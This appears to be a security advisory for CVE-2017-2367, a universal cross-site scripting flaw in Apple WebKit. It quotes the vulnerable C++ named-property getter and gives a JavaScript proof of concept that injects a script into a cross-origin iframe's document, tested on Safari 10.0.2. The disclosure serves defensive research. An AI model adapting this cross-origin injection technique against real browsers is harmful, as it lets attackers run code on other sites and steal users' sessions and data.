Apple Webkit: UXSS by accessing a named property from an unloaded window CVE-2017-2367 The frame is not detached from an unloaded window. We can access to the new document's named properties via the following function. static bool jsDOMWindowPropertiesGetOwnPropertySlotNamedItemGetter(JSDOMWindowProperties* thisObject, Frame& frame, ExecState* exec, PropertyName propertyName, PropertySlot& slot) { ... Document* document = frame.document(); <<-------- the new document. if (is(*document)) { auto& htmlDocument = downcast(*document); auto* atomicPropertyName = propertyName.publicName(); if (atomicPropertyName && htmlDocument.hasWindowNamedItem(*atomicPropertyName)) { JSValue namedItem; if (UNLIKELY(htmlDocument.windowNamedItemContainsMultipleElements(*atomicPropertyName))) { Ref collection = document->windowNamedItems(atomicPropertyName); ASSERT(collection->length() > 1); namedItem = toJS(exec, thisObject->globalObject(), collection); } else namedItem = toJS(exec, thisObject->globalObject(), htmlDocument.windowNamedItem(*atomicPropertyName)); slot.setValue(thisObject, ReadOnly | DontDelete | DontEnum, namedItem); return true; } } return false; } PoC: "use strict"; let f = document.body.appendChild(document.createElement("iframe")); let get_element = f.contentWindow.Function("return logo;"); f.onload = () => { f.onload = null; let node = get_element(); var sc = document.createElement("script"); sc.innerText = "alert(location)"; node.appendChild(sc); }; f.src = "https://abc.xyz/"; Tested on Safari 10.0.2(12602.3.12.0.1). This bug is subject to a 90 day disclosure deadline. If 90 days elapse without a broadly available patch, then the bug report will automatically become visible to the public. Found by: lokihardt